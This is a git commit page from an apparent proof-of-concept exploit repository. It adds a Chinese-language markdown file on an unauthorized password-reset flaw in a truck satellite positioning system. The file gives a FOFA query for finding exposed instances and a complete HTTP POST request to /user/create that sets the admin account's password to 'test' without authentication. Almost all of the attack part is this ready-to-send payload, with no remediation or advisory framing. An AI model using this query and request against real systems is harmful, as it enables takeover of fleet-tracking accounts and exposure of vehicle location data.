mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 卡车卫星定位系统create存在未授权密码重置漏洞.md
This commit is contained in:
parent
cbacfe2bda
commit
2a26438714
23
卡车卫星定位系统create存在未授权密码重置漏洞.md
Normal file
23
卡车卫星定位系统create存在未授权密码重置漏洞.md
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
## 卡车卫星定位系统create存在未授权密码重置漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
icon_hash="1553867732"
|
||||||
|
```
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /user/create HTTP/1.1
|
||||||
|
Host:
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: zh-CN,zh;q=0.9
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
account=admin&id=1&password=test&passwordRepeat=test&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user